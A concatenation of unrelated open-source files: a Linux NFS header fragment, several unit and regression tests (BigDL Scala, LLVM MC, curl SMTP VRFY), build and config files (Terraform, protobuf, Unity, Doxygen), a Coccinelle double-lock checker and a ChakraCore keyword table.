fh; struct nfs_seqid * seqid; int open_flags; __u64 clientid; __u32 id; union { struct iattr * attrs; nfs4_verifier verifier; nfs4_stateid delegation; int delegation_type; } u; const struct qstr * name; const struct nfs_server *server; const u32 * bitmask; __u32 claim; }; struct nfs_openres { nfs4_stateid stateid; struct nfs_fh fh; struct nfs4_change_info cinfo; __u32 rflags; struct nfs_fattr * f_attr; struct nfs_fattr * dir_attr; const struct nfs_server *server; int delegation_type; nfs4_stateid delegation; __u32 do_recall; __u64 maxsize; }; struct nfs_open_confirmargs { const struct nfs_fh * fh; nfs4_stateid * stateid; struct nfs_seqid * seqid; }; struct nfs_open_confirmres { nfs4_stateid stateid; }; struct nfs_closeargs { struct nfs_fh * fh; nfs4_stateid * stateid; struct nfs_seqid * seqid; int open_flags; const u32 * bitmask; }; struct nfs_closeres { nfs4_stateid stateid; struct nfs_fattr * fattr; const struct nfs_server *server; }; struct nfs_lowner { __u64 clientid; u32 id; }; struct nfs_lock_args { struct nfs_fh * fh; struct file_lock * fl; struct nfs_seqid * lock_seqid; nfs4_stateid * lock_stateid; struct nfs_seqid * open_seqid; nfs4_stateid * open_stateid; struct nfs_lowner lock_owner; unsigned char block : 1; unsigned char reclaim : 1; unsigned char new_lock_owner : 1; }; struct nfs_lock_res { nfs4_stateid stateid; }; struct nfs_locku_args { struct nfs_fh * fh; struct file_lock * fl; struct nfs_seqid * seqid; nfs4_stateid * stateid; }; struct nfs_locku_res { nfs4_stateid stateid; }; struct nfs_lockt_args { struct nfs_fh * fh; struct file_lock * fl; struct nfs_lowner lock_owner; }; struct nfs_lockt_res { struct file_lock * denied; }; struct nfs4_delegreturnargs { const struct nfs_fh *fhandle; const nfs4_stateid *stateid; const u32 * bitmask; }; struct nfs4_delegreturnres { struct nfs_fattr * fattr; const struct 
nfs_server *server; }; struct nfs_readargs { struct nfs_fh * fh; struct nfs_open_context *context; __u64 offset; __u32 count; unsigned int pgbase; struct page ** pages; }; struct nfs_readres { struct nfs_fattr * fattr; __u32 count; int eof; }; struct nfs_writeargs { struct nfs_fh * fh; struct nfs_open_context *context; __u64 offset; __u32 count; enum nfs3_stable_how stable; unsigned int pgbase; struct page ** pages; const u32 * bitmask; }; struct nfs_writeverf { enum nfs3_stable_how committed; __u32 verifier[2]; }; struct nfs_writeres { struct nfs_fattr * fattr; struct nfs_writeverf * verf; __u32 count; const struct nfs_server *server; }; struct nfs_entry { __u64 ino; __u64 cookie, prev_cookie; const char * name; unsigned int len; int eof; struct nfs_fh * fh; struct nfs_fattr * fattr; }; struct nfs_sattrargs { struct nfs_fh * fh; struct iattr * sattr; }; struct nfs_diropargs { struct nfs_fh * fh; const char * name; unsigned int len; }; struct nfs_createargs { struct nfs_fh * fh; const char * name; unsigned int len; struct iattr * sattr; }; struct nfs_renameargs { struct nfs_fh * fromfh; const char * fromname; unsigned int fromlen; struct nfs_fh * tofh; const char * toname; unsigned int tolen; }; struct nfs_setattrargs { struct nfs_fh * fh; nfs4_stateid stateid; struct iattr * iap; const struct nfs_server * server; const u32 * bitmask; }; struct nfs_setaclargs { struct nfs_fh * fh; size_t acl_len; unsigned int acl_pgbase; struct page ** acl_pages; }; struct nfs_getaclargs { struct nfs_fh * fh; size_t acl_len; unsigned int acl_pgbase; struct page ** acl_pages; }; struct nfs_setattrres { struct nfs_fattr * fattr; const struct nfs_server * server; }; struct nfs_linkargs { struct nfs_fh * fromfh; struct nfs_fh * tofh; const char * toname; unsigned int tolen; }; struct nfs_symlinkargs { struct nfs_fh * fromfh; const char * fromname; unsigned int fromlen; const char * topath; unsigned int tolen; struct iattr * sattr; }; struct nfs_readdirargs { struct nfs_fh * fh; __u32 cookie; unsigned int count; struct page ** pages; }; struct nfs3_getaclargs { struct nfs_fh * fh; int mask; struct page ** pages; }; struct nfs3_setaclargs { struct inode * inode; int mask; struct posix_acl * acl_access; struct posix_acl * acl_default; struct page ** pages; }; struct nfs_diropok { struct nfs_fh * fh; struct nfs_fattr * fattr; }; struct nfs_readlinkargs { struct nfs_fh * fh; unsigned int pgbase; unsigned int pglen; struct page ** pages; }; struct nfs3_sattrargs { struct nfs_fh * fh; struct iattr * sattr; unsigned int guard; struct timespec guardtime; }; struct nfs3_diropargs { struct nfs_fh * fh; const char * name; unsigned int len; }; struct nfs3_accessargs { struct nfs_fh * fh; __u32 access; }; struct nfs3_createargs { struct nfs_fh * fh; const char * name; unsigned int len; struct iattr * sattr; enum nfs3_createmode createmode; __u32 verifier[2]; }; struct nfs3_mkdirargs { struct nfs_fh * fh; const char * name; unsigned int len; struct iattr * sattr; }; struct nfs3_symlinkargs { struct nfs_fh * fromfh; const char * fromname; unsigned int fromlen; const char * topath; unsigned int tolen; struct iattr * sattr; }; struct nfs3_mknodargs { struct nfs_fh * fh; const char * name; unsigned int len; enum nfs3_ftype type; struct iattr * sattr; dev_t rdev; }; struct nfs3_renameargs { struct nfs_fh * fromfh; const char * fromname; unsigned int fromlen; struct nfs_fh * tofh; const char * toname; unsigned int tolen; }; struct nfs3_linkargs { struct nfs_fh * fromfh; struct nfs_fh * tofh; const char * toname; unsigned int 
tolen; }; struct nfs3_readdirargs { struct nfs_fh * fh; __u64 cookie; __u32 verf[2]; int plus; unsigned int count; struct page ** pages; }; struct nfs3_diropres { struct nfs_fattr * dir_attr; struct nfs_fh * fh; struct nfs_fattr * fattr; }; struct nfs3_accessres { struct nfs_fattr * fattr; __u32 access; }; struct nfs3_readlinkargs { struct nfs_fh * fh; unsigned int pgbase; unsigned int pglen; struct page ** pages; }; struct nfs3_renameres { struct nfs_fattr * fromattr; struct nfs_fattr * toattr; }; struct nfs3_linkres { struct nfs_fattr * dir_attr; struct nfs_fattr * fattr; }; struct nfs3_readdirres { struct nfs_fattr * dir_attr; __u32 * verf; int plus; }; struct nfs3_getaclres { struct nfs_fattr * fattr; int mask; unsigned int acl_access_count; unsigned int acl_default_count; struct posix_acl * acl_access; struct posix_acl * acl_default; }; struct nfs_page; #define NFS_PAGEVEC_SIZE (8U) struct nfs_read_data { int flags; struct rpc_task task; struct inode *inode; struct rpc_cred *cred; struct nfs_fattr fattr; struct list_head pages; struct nfs_page *req; struct page **pagevec; unsigned int npages; struct nfs_readargs args; struct nfs_readres res; struct page *page_array[NFS_PAGEVEC_SIZE]; }; struct nfs_write_data { int flags; struct rpc_task task; struct inode *inode; struct rpc_cred *cred; struct nfs_fattr fattr; struct nfs_writeverf verf; struct list_head pages; struct nfs_page *req; struct page **pagevec; unsigned int npages; struct nfs_writeargs args; struct nfs_writeres res; struct page *page_array[NFS_PAGEVEC_SIZE]; }; struct nfs_access_entry; struct nfs_rpc_ops { int version; struct dentry_operations *dentry_ops; struct inode_operations *dir_inode_ops; struct inode_operations *file_inode_ops; int (*getroot) (struct nfs_server *, struct nfs_fh *, struct nfs_fsinfo *); int (*getattr) (struct nfs_server *, struct nfs_fh *, struct nfs_fattr *); int (*setattr) (struct dentry *, struct nfs_fattr *, struct iattr *); int (*lookup) (struct inode *, struct qstr *, struct nfs_fh *, struct nfs_fattr *); int (*access) (struct inode *, struct nfs_access_entry *); int (*readlink)(struct inode *, struct page *, unsigned int, unsigned int); int (*read) (struct nfs_read_data *); int (*write) (struct nfs_write_data *); int (*commit) (struct nfs_write_data *); int (*create) (struct inode *, struct dentry *, struct iattr *, int, struct nameidata *); int (*remove) (struct inode *, struct qstr *); int (*unlink_setup) (struct rpc_message *, struct dentry *, struct qstr *); int (*unlink_done) (struct dentry *, struct rpc_task *); int (*rename) (struct inode *, struct qstr *, struct inode *, struct qstr *); int (*link) (struct inode *, struct inode *, struct qstr *); int (*symlink) (struct inode *, struct qstr *, struct qstr *, struct iattr *, struct nfs_fh *, struct nfs_fattr *); int (*mkdir) (struct inode *, struct dentry *, struct iattr *); int (*rmdir) (struct inode *, struct qstr *); int (*readdir) (struct dentry *, struct rpc_cred *, u64, struct page *, unsigned int, int); int (*mknod) (struct inode *, struct dentry *, struct iattr *, dev_t); int (*statfs) (struct nfs_server *, struct nfs_fh *, struct nfs_fsstat *); int (*fsinfo) (struct nfs_server *, struct nfs_fh *, struct nfs_fsinfo *); int (*pathconf) (struct nfs_server *, struct nfs_fh *, struct nfs_pathconf *); u32 * (*decode_dirent)(u32 *, struct nfs_entry *, int plus); void (*read_setup) (struct nfs_read_data *); int (*read_done) (struct rpc_task *, struct nfs_read_data *); void (*write_setup) (struct nfs_write_data *, int how); int 
(*write_done) (struct rpc_task *, struct nfs_write_data *); void (*commit_setup) (struct nfs_write_data *, int how); int (*commit_done) (struct rpc_task *, struct nfs_write_data *); int (*file_open) (struct inode *, struct file *); int (*file_release) (struct inode *, struct file *); int (*lock)(struct file *, int, struct file_lock *); void (*clear_acl_cache)(struct inode *); }; #define NFS_CALL(op, inode, args) NFS_PROTO(inode)->op args #endif
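/*
 * Illustrative note (not part of the original header): NFS_CALL dispatches
 * through the per-version nfs_rpc_ops vtable above, so a call such as
 *
 *     NFS_CALL(read, inode, (rdata));
 *
 * expands to
 *
 *     NFS_PROTO(inode)->read (rdata);
 *
 * where 'rdata' stands for some caller-supplied struct nfs_read_data *.
 */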
{ "pile_set_name": "Github" }
<!-- HTML footer for doxygen 1.8.15-->
<!-- start footer part -->
<!--BEGIN GENERATE_TREEVIEW-->
<div id="nav-path" class="navpath"><!-- id is needed for treeview function! -->
  <ul>
    $navpath
    <li class="footer">$generatedby
      <a href="http://www.doxygen.org/index.html">
        <img class="footer" src="$relpath^doxygen.png" alt="doxygen"/></a> $doxygenversion
    </li>
  </ul>
</div>
<!--END GENERATE_TREEVIEW-->
<!--BEGIN !GENERATE_TREEVIEW-->
<hr class="footer"/><address class="footer"><small>
$generatedby &#160;<a href="http://www.doxygen.org/index.html">
<img class="footer" src="$relpath^doxygen.png" alt="doxygen"/>
</a> $doxygenversion
</small></address>
<!--END !GENERATE_TREEVIEW-->
</body>
</html>
{ "pile_set_name": "Github" }
/* * Copyright 2016 The BigDL Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intel.analytics.bigdl.nn import org.scalatest.FlatSpec import com.intel.analytics.bigdl.tensor.Tensor import com.intel.analytics.bigdl.utils.serializer.ModuleSerializationTest import scala.math.abs import scala.util.Random @com.intel.analytics.bigdl.tags.Parallel class ThresholdSpec extends FlatSpec { "A Threshold Module " should "generate correct output and grad" in { val module = new Threshold[Double](1, 0.8) val input = Tensor[Double](2, 2, 2) input(Array(1, 1, 1)) = -0.89699813351035 input(Array(1, 1, 2)) = 1.8529373928905 input(Array(1, 2, 1)) = 1.8799053365365 input(Array(1, 2, 2)) = 0.076761466450989 input(Array(2, 1, 1)) = 1.8863626234233 input(Array(2, 1, 2)) = 0.73405137099326 input(Array(2, 2, 1)) = 1.3404842875898 input(Array(2, 2, 2)) = -0.64910735283047 val gradOutput = Tensor[Double](2, 2, 2) gradOutput(Array(1, 1, 1)) = 0.31924905977212 gradOutput(Array(1, 1, 2)) = 0.22160539613105 gradOutput(Array(1, 2, 1)) = 0.19705923949368 gradOutput(Array(1, 2, 2)) = 0.386440459406 gradOutput(Array(2, 1, 1)) = 0.12920403806493 gradOutput(Array(2, 1, 2)) = 0.7669838971924 gradOutput(Array(2, 2, 1)) = 0.10939974407665 gradOutput(Array(2, 2, 2)) = 0.70845287665725 val expectedOutput = Tensor[Double](2, 2, 2) expectedOutput(Array(1, 1, 1)) = 0.8 expectedOutput(Array(1, 1, 2)) = 1.8529373928905 expectedOutput(Array(1, 2, 1)) = 1.8799053365365 expectedOutput(Array(1, 2, 2)) = 0.8 expectedOutput(Array(2, 1, 1)) = 1.8863626234233 expectedOutput(Array(2, 1, 2)) = 0.8 expectedOutput(Array(2, 2, 1)) = 1.3404842875898 expectedOutput(Array(2, 2, 2)) = 0.8 val expectedGrad = Tensor[Double](2, 2, 2) expectedGrad(Array(1, 1, 1)) = 0 expectedGrad(Array(1, 1, 2)) = 0.22160539613105 expectedGrad(Array(1, 2, 1)) = 0.19705923949368 expectedGrad(Array(1, 2, 2)) = 0 expectedGrad(Array(2, 1, 1)) = 0.12920403806493 expectedGrad(Array(2, 1, 2)) = 0 expectedGrad(Array(2, 2, 1)) = 0.10939974407665 expectedGrad(Array(2, 2, 2)) = 0 val inputOrg = input.clone() val gradOutputOrg = gradOutput.clone() val output = module.forward(input) val gradInput = module.backward(input, gradOutput) expectedOutput.map(output, (v1, v2) => { assert(abs(v1 - v2) < 1e-6); v1 }) expectedGrad.map(gradInput, (v1, v2) => { assert(abs(v1 - v2) < 1e-6); v1 }) assert(input == inputOrg) assert(gradOutput == gradOutputOrg) } "A Threshold Module with inPlace = true" should "generate correct output and grad" in { val module = new Threshold[Double](1, 0.8, true) val input = Tensor[Double](2, 2, 2) input(Array(1, 1, 1)) = -0.89699813351035 input(Array(1, 1, 2)) = 1.8529373928905 input(Array(1, 2, 1)) = 1.8799053365365 input(Array(1, 2, 2)) = 0.076761466450989 input(Array(2, 1, 1)) = 1.8863626234233 input(Array(2, 1, 2)) = 0.73405137099326 input(Array(2, 2, 1)) = 1.3404842875898 input(Array(2, 2, 2)) = -0.64910735283047 val gradOutput = Tensor[Double](2, 2, 2) gradOutput(Array(1, 1, 1)) = 0.31924905977212 gradOutput(Array(1, 1, 2)) = 0.22160539613105 
gradOutput(Array(1, 2, 1)) = 0.19705923949368 gradOutput(Array(1, 2, 2)) = 0.386440459406 gradOutput(Array(2, 1, 1)) = 0.12920403806493 gradOutput(Array(2, 1, 2)) = 0.7669838971924 gradOutput(Array(2, 2, 1)) = 0.10939974407665 gradOutput(Array(2, 2, 2)) = 0.70845287665725 val expectedOutput = Tensor[Double](2, 2, 2) expectedOutput(Array(1, 1, 1)) = 0.8 expectedOutput(Array(1, 1, 2)) = 1.8529373928905 expectedOutput(Array(1, 2, 1)) = 1.8799053365365 expectedOutput(Array(1, 2, 2)) = 0.8 expectedOutput(Array(2, 1, 1)) = 1.8863626234233 expectedOutput(Array(2, 1, 2)) = 0.8 expectedOutput(Array(2, 2, 1)) = 1.3404842875898 expectedOutput(Array(2, 2, 2)) = 0.8 val expectedGrad = Tensor[Double](2, 2, 2) expectedGrad(Array(1, 1, 1)) = 0 expectedGrad(Array(1, 1, 2)) = 0.22160539613105 expectedGrad(Array(1, 2, 1)) = 0.19705923949368 expectedGrad(Array(1, 2, 2)) = 0 expectedGrad(Array(2, 1, 1)) = 0.12920403806493 expectedGrad(Array(2, 1, 2)) = 0 expectedGrad(Array(2, 2, 1)) = 0.10939974407665 expectedGrad(Array(2, 2, 2)) = 0 val inputOrg = input.clone() val gradOutputOrg = gradOutput.clone() val output = module.forward(input) val gradInput = module.backward(input, gradOutput) expectedOutput.map(output, (v1, v2) => { assert(abs(v1 - v2) < 1e-6); v1 }) expectedGrad.map(gradInput, (v1, v2) => { assert(abs(v1 - v2) < 1e-6); v1 }) // InPlace test assert(output == input) assert(gradInput == gradOutput) } "A Threshold Module with inPlace = true clearstate" should "not clear input" in { val module = new Threshold[Double](1, 0.8, true) val input = Tensor[Double](2, 2, 2) module.forward(input) module.clearState() assert(input.nElement() == 8) } } class ThresholdSerialTest extends ModuleSerializationTest { override def test(): Unit = { val threshold = Threshold[Float](0.5).setName("threshold") val input = Tensor[Float](5, 5).apply1(_ => Random.nextFloat()) runSerializationTest(threshold, input) } }
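// Illustrative usage sketch (added for clarity, not part of the original
// spec; assumes the same imports as above). Threshold(th, v) keeps elements
// greater than th and replaces the rest with v, which is exactly what the
// expected tensors in the tests above encode.
object ThresholdUsageExample {
  def main(args: Array[String]): Unit = {
    val module = new Threshold[Double](1, 0.8)
    val input = Tensor[Double](2, 2).apply1(_ => Random.nextDouble())
    val output = module.forward(input) // entries <= 1 are replaced by 0.8
    println(output)
  }
}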
{ "pile_set_name": "Github" }
@ RUN: llvm-mc -triple armv7-apple-darwin10 -filetype=obj -o - < %s | llvm-readobj --macho-data-in-code | FileCheck %s

	.text
_foo:
	.data_region
	.long 10
	.end_data_region
	.data_region jt32
	.long 1
	.end_data_region
	.data_region jt16
	.short 2
	.end_data_region
	.data_region jt8
	.byte 3
	.end_data_region

@ CHECK: File: <stdin>
@ CHECK: Format: Mach-O arm
@ CHECK: Arch: arm
@ CHECK: AddressSize: 32bit
@ CHECK: DataInCode {
@ CHECK:   Data offset: 300
@ CHECK:   Data size: 32
@ CHECK:   Data entries [
@ CHECK:     Entry {
@ CHECK:       Index: 0
@ CHECK:       Offset: 0
@ CHECK:       Length: 4
@ CHECK:       Kind: 1
@ CHECK:     }
@ CHECK:     Entry {
@ CHECK:       Index: 1
@ CHECK:       Offset: 4
@ CHECK:       Length: 4
@ CHECK:       Kind: 4
@ CHECK:     }
@ CHECK:     Entry {
@ CHECK:       Index: 2
@ CHECK:       Offset: 8
@ CHECK:       Length: 2
@ CHECK:       Kind: 3
@ CHECK:     }
@ CHECK:     Entry {
@ CHECK:       Index: 3
@ CHECK:       Offset: 10
@ CHECK:       Length: 1
@ CHECK:       Kind: 2
@ CHECK:     }
@ CHECK:   ]
@ CHECK: }
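@ Note (added for clarity): the Kind values above are the Mach-O data-in-code
@ entry kinds, i.e. 1 = DICE_KIND_DATA (.data_region), 2 = DICE_KIND_JUMP_TABLE8
@ (jt8), 3 = DICE_KIND_JUMP_TABLE16 (jt16) and 4 = DICE_KIND_JUMP_TABLE32 (jt32),
@ matching the four regions declared in the test body.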
{ "pile_set_name": "Github" }
export default {
  fileName: `/lib.es2019.string.d.ts`,
  // File text is copyright Microsoft Corporation and is distributed under the Apache License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
  text: `/// <reference no-default-lib="true"/>\ninterface String{trimEnd():string;trimStart():string;trimLeft():string;trimRight():string;}`
};
{ "pile_set_name": "Github" }
fileFormatVersion: 2
guid: 8d2d730973eb8ae4eaf627417475a972
timeCreated: 1465779652
licenseType: Pro
MonoImporter:
  serializedVersion: 2
  defaultReferences: []
  executionOrder: 0
  icon: {instanceID: 0}
  userData:
  assetBundleName:
  assetBundleVariant:
{ "pile_set_name": "Github" }
// Protocol Buffers - Google's data interchange format
// Copyright 2008 Google Inc. All rights reserved.
// https://developers.google.com/protocol-buffers/
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
//     * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
//     * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
//     * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
// Author: [email protected] (Pherl Liu)

syntax = "proto2";

package protobuf_unittest_import;

option optimize_for = LITE_RUNTIME;

option java_package = "com.google.protobuf";

message PublicImportMessageLite {
  optional int32 e = 1;
}
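// Note (added for clarity): optimize_for = LITE_RUNTIME makes the generated
// class build on the reflection-free MessageLite runtime instead of the full
// Message runtime, so files importing this one generally must be lite as well.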
{ "pile_set_name": "Github" }
/// Find double locks. False positives may occur when some paths cannot
/// occur at execution, due to the values of variables, and when there is
/// an intervening function call that releases the lock.
///
// Confidence: Moderate
// Copyright: (C) 2010 Nicolas Palix, DIKU. GPLv2.
// Copyright: (C) 2010 Julia Lawall, DIKU. GPLv2.
// Copyright: (C) 2010 Gilles Muller, INRIA/LiP6. GPLv2.
// URL: http://coccinelle.lip6.fr/
// Comments:
// Options: --no-includes --include-headers

virtual org
virtual report

@locked@
position p1;
expression E1;
position p;
@@

(
mutex_lock@p1
|
mutex_trylock@p1
|
spin_lock@p1
|
spin_trylock@p1
|
read_lock@p1
|
read_trylock@p1
|
write_lock@p1
|
write_trylock@p1
) (E1@p,...);

@balanced@
position p1 != locked.p1;
position locked.p;
identifier lock,unlock;
expression x <= locked.E1;
expression E,locked.E1;
expression E2;
@@

if (E) {
 <+... when != E1
 lock(E1@p,...)
 ...+>
}
... when != E1
    when != \(x = E2\|&x\)
    when forall
if (E) {
 <+... when != E1
 unlock@p1(E1,...)
 ...+>
}

@r depends on !balanced exists@
expression x <= locked.E1;
expression locked.E1;
expression E2;
identifier lock;
position locked.p,p1,p2;
@@

lock@p1 (E1@p,...);
... when != E1
    when != \(x = E2\|&x\)
lock@p2 (E1,...);

@script:python depends on org@
p1 << r.p1;
p2 << r.p2;
lock << r.lock;
@@

cocci.print_main(lock,p1)
cocci.print_secs("second lock",p2)

@script:python depends on report@
p1 << r.p1;
p2 << r.p2;
lock << r.lock;
@@

msg = "second lock on line %s" % (p2[0].line)
coccilib.report.print_report(p1[0],msg)
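// Illustrative C fragment (not from the kernel) of the shape rule r reports
// when no balancing unlock intervenes on the path:
//
//     spin_lock(&dev->lock);      // matched at position p1
//     ...
//     spin_lock(&dev->lock);      // reported as "second lock" (p2)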
{ "pile_set_name": "Github" }
terraform {
  required_version = "~> 0.12.0"

  backend "s3" {}
}

provider "aws" {
  version = "~> 2.17"

  assume_role {
    role_arn = var.aws_assume_role_arn
  }
}

variable "aws_assume_role_arn" {
  type = string
}

variable "namespace" {
  type        = string
  description = "Namespace (e.g. `eg` or `cp`)"
}

variable "stage" {
  type        = string
  description = "Stage (e.g. `prod`, `dev`, `staging`)"
}

variable "dns_zone_name" {
  type        = string
  default     = ""
  description = "The DNS domain under which to put entries for the database. Usually the same as the cluster name, e.g. us-west-2.prod.cpco.io"
}

variable "chamber_service" {
  type        = string
  default     = "grafana"
  description = "`chamber` service name. See [chamber usage](https://github.com/segmentio/chamber#usage) for more details"
}

variable "chamber_parameter_name_pattern" {
  type        = string
  default     = "/%s/%s"
  description = "Format string for creating SSM parameter name used to store chamber parameters. The default is usually best."
}

variable "chamber_kms_key_id" {
  type        = string
  default     = "alias/aws/ssm"
  description = "KMS key ID, ARN, or alias to use for encrypting SSM secrets"
}

variable "vpc_id" {
  type        = string
  description = "The ID of the VPC to create the resources in, or SSM parameter key for it"
}

variable "vpc_subnet_ids" {
  type        = string
  description = "Comma separated string list of AWS Subnet IDs in which to place the database, or SSM parameter key for it"
}
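# Illustrative note (not part of the original module): with the defaults
# above, chamber_parameter_name_pattern = "/%s/%s" and chamber_service =
# "grafana" produce SSM parameter names of the form
#
#   /grafana/<key>   (e.g. /grafana/admin_password for a hypothetical key)
#
# encrypted with the KMS key referenced by chamber_kms_key_id.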
{ "pile_set_name": "Github" }
/* Localized versions of Info.plist keys */

CFBundleName = "X11";
CFBundleGetInfoString = "X11 version 2.0, Copyright 2007 Apple Inc.";
{ "pile_set_name": "Github" }
<testcase>
<info>
<keywords>
SMTP
VRFY
</keywords>
</info>

#
# Server-side
<reply>
<data>
252 Send some mail and I'll try my best
</data>
</reply>

#
# Client-side
<client>
<server>
smtp
</server>
<name>
SMTP external VRFY
</name>
<command>
smtp://%HOSTIP:%SMTPPORT/925 --mail-rcpt [email protected]
</command>
</client>

#
# Verify data after the test has been "shot"
<verify>
<protocol>
EHLO 925
VRFY [email protected]
QUIT
</protocol>
</verify>
</testcase>
{ "pile_set_name": "Github" }
//------------------------------------------------------------------------------------------------------- // Copyright (C) Microsoft. All rights reserved. // Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. //------------------------------------------------------------------------------------------------------- #ifndef KEYWORD #define KEYWORD(tk,f,prec2,nop2,prec1,nop1,name) #endif //!KEYWORD #ifndef S_KEYWORD #define S_KEYWORD(name,f,lab) #endif //!S_KEYWORD // token reserved word? (see fidXXX values in enum, in hash.h) // binary operator precedence // binary operator // unary operator precedence // unary operator // name KEYWORD(tkABSTRACT ,0, No, knopNone , No, knopNone , abstract) KEYWORD(tkASSERT ,0, No, knopNone , No, knopNone , assert) KEYWORD(tkAWAIT ,1, No, knopNone ,Uni, knopAwait , await) KEYWORD(tkBOOLEAN ,0, No, knopNone , No, knopNone , boolean) KEYWORD(tkBREAK ,1, No, knopNone , No, knopNone , break) KEYWORD(tkBYTE ,0, No, knopNone , No, knopNone , byte) KEYWORD(tkCASE ,1, No, knopNone , No, knopNone , case) KEYWORD(tkCATCH ,1, No, knopNone , No, knopNone , catch) KEYWORD(tkCHAR ,0, No, knopNone , No, knopNone , char) KEYWORD(tkCONTINUE ,1, No, knopNone , No, knopNone , continue) KEYWORD(tkDEBUGGER ,1, No, knopNone , No, knopNone , debugger) KEYWORD(tkDECIMAL ,0, No, knopNone , No, knopNone , decimal) KEYWORD(tkDEFAULT ,1, No, knopNone , No, knopNone , default) KEYWORD(tkDELETE ,1, No, knopNone ,Uni, knopDelete , delete) KEYWORD(tkDO ,1, No, knopNone , No, knopNone , do) KEYWORD(tkDOUBLE ,0, No, knopNone , No, knopNone , double) KEYWORD(tkELSE ,1, No, knopNone , No, knopNone , else) KEYWORD(tkENSURE ,0, No, knopNone , No, knopNone , ensure) KEYWORD(tkEVENT ,0, No, knopNone , No, knopNone , event) KEYWORD(tkFALSE ,1, No, knopNone , No, knopNone , false) KEYWORD(tkFINAL ,0, No, knopNone , No, knopNone , final) KEYWORD(tkFINALLY ,1, No, knopNone , No, knopNone , finally) KEYWORD(tkFLOAT ,0, No, knopNone , No, knopNone , float) KEYWORD(tkFOR ,1, No, knopNone , No, knopNone , for) KEYWORD(tkFUNCTION ,1, No, knopNone , No, knopNone , function) KEYWORD(tkGET ,0, No, knopNone , No, knopNone , get) KEYWORD(tkGOTO ,0, No, knopNone , No, knopNone , goto) KEYWORD(tkIF ,1, No, knopNone , No, knopNone , if) KEYWORD(tkIN ,1, Cmp, knopIn , No, knopNone , in) KEYWORD(tkINSTANCEOF ,1, Cmp,knopInstOf , No, knopNone , instanceof) KEYWORD(tkINT ,0, No, knopNone , No, knopNone , int) KEYWORD(tkINTERNAL ,0, No, knopNone , No, knopNone , internal) KEYWORD(tkINVARIANT ,0, No, knopNone , No, knopNone , invariant) KEYWORD(tkLONG ,0, No, knopNone , No, knopNone , long) KEYWORD(tkNAMESPACE ,0, No, knopNone , No, knopNone , namespace) KEYWORD(tkNATIVE ,0, No, knopNone , No, knopNone , native) KEYWORD(tkNEW ,1, No, knopNone , No, knopNone , new) KEYWORD(tkNULL ,1, No, knopNone , No, knopNone , null) KEYWORD(tkREQUIRE ,0, No, knopNone , No, knopNone , require) KEYWORD(tkRETURN ,1, No, knopNone , No, knopNone , return) KEYWORD(tkSBYTE ,0, No, knopNone , No, knopNone , sbyte) KEYWORD(tkSET ,0, No, knopNone , No, knopNone , set) KEYWORD(tkSHORT ,0, No, knopNone , No, knopNone , short) KEYWORD(tkSWITCH ,1, No, knopNone , No, knopNone , switch) KEYWORD(tkSYNCHRONIZED,0, No, knopNone , No, knopNone , synchronized) KEYWORD(tkTHIS ,1, No, knopNone , No, knopNone , this) KEYWORD(tkTHROW ,1, No, knopNone , No, knopNone , throw) KEYWORD(tkTHROWS ,0, No, knopNone , No, knopNone , throws) KEYWORD(tkTRANSIENT ,0, No, knopNone , No, knopNone , transient) 
KEYWORD(tkTRUE ,1, No, knopNone , No, knopNone , true) KEYWORD(tkTRY ,1, No, knopNone , No, knopNone , try) KEYWORD(tkTYPEOF ,1, No, knopNone ,Uni, knopTypeof , typeof) KEYWORD(tkUINT ,0, No, knopNone , No, knopNone , uint) KEYWORD(tkULONG ,0, No, knopNone , No, knopNone , ulong) KEYWORD(tkUSE ,0, No, knopNone , No, knopNone , use) KEYWORD(tkUSHORT ,0, No, knopNone , No, knopNone , ushort) KEYWORD(tkVAR ,1, No, knopNone , No, knopNone , var) KEYWORD(tkVOID ,1, No, knopNone ,Uni, knopVoid , void) KEYWORD(tkVOLATILE ,0, No, knopNone , No, knopNone , volatile) KEYWORD(tkWHILE ,1, No, knopNone , No, knopNone , while) KEYWORD(tkWITH ,1, No, knopNone , No, knopNone , with) // Future reserved words that become keywords in ES6 KEYWORD(tkCLASS ,1, No, knopNone , No, knopNone , class) KEYWORD(tkCONST ,1, No, knopNone , No, knopNone , const) KEYWORD(tkEXPORT ,1, No, knopNone , No, knopNone , export) KEYWORD(tkEXTENDS ,1, No, knopNone , No, knopNone , extends) KEYWORD(tkIMPORT ,1, No, knopNone , No, knopNone , import) KEYWORD(tkSUPER ,1, No, knopNone , No, knopNone , super) // Note: yield is still treated as an identifier in non-strict, non-generator functions // and is special cased in jsscan.js when generating kwd-swtch.h // Note: yield is a weird operator in that it has assignment expression level precedence // but looks like a unary operator KEYWORD(tkYIELD ,1, No, knopNone ,Asg, knopYield , yield) // Future reserved words in strict and non-strict modes KEYWORD(tkENUM ,1, No, knopNone , No, knopNone , enum) 